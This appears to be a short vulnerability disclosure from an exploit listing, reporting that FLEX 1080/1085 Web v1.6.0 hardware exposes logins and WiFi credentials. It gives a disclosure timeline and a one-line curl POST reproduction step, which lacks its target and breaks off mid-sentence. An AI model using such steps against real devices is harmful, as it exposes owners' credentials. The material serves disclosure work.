# Exploit Title: FLEX 1080/1085 Web - Information Disclosure
# Exploit Author: Mr Empy
# Vendor Homepage:
# Software Link:
# Version: 1.6.0
# Tested on: Linux

FLEX 1080/1085 Web - Information Disclosure

The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive
information such as username and password, WiFi SSID and WiFi password.

Severity Level:
9.1 (Critical)

Vulnerability Disclosure Schedule:
* January 13, 2022: An email was sent to support.

* February 13, 2022: I didn't get any response from support.

* February 14, 2022: Vulnerability Disclosure

Affected Product:
FLEX 1080/1085 Web v1.6.0

Steps to Reproduce:

1. Open a terminal and enter the following command:

curl -X POST -d 'force=1'

After that you will be able to see the hardware logs without having any

